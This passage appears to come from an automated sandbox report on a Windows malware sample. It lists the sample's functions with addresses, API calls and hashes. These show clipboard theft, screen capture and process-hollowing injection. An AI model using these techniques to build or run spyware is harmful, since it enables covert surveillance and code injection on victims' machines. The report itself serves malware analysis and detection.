                                                                                                • Opcode ID: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                                • Instruction ID: d52e19fe16dfdee109f40d049db845c42e01460133d57766726f1505d2785bee
                                                                                                • Opcode Fuzzy Hash: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                                • Instruction Fuzzy Hash: 2D31F371904205EFDB15DF69CE8186EBBB8FF0572072446AFE024A73A1D3748D41EB28
                                                                                                Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2829624132-0
                                                                                                • Opcode ID: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                • Opcode Fuzzy Hash: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00000000), ref: 004338DA
                                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                                • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                                • CloseClipboard.USER32 ref: 0040B760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                                • String ID:
                                                                                                • API String ID: 2058664381-0
                                                                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$FreeProcess
                                                                                                • String ID:
                                                                                                • API String ID: 3859560861-0
                                                                                                • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                                                • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                                                                • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                                                • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                                                                Function 00434CB6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-0
                                                                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                • String ID:
                                                                                                • API String ID: 1663032902-0
                                                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                Function 0045201B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                • Opcode Fuzzy Hash: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 2692324296-0
                                                                                                • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                Function 004520B6 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                • Opcode Fuzzy Hash: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                • EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                • String ID: DISPLAY
                                                                                                • API String ID: 479521175-865373369
                                                                                                • Opcode ID: 9a97fceca4f2f6951310b654da6c284d7bb2a27c8a5317384e21f7fa5a4148a9
                                                                                                • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                                                                                • Opcode Fuzzy Hash: 9a97fceca4f2f6951310b654da6c284d7bb2a27c8a5317384e21f7fa5a4148a9
                                                                                                • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                • API String ID: 4188446516-3035715614
                                                                                                • Opcode ID: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                                                                                • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                                                                                • Opcode Fuzzy Hash: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                                                                                • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59
                                                                                                Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
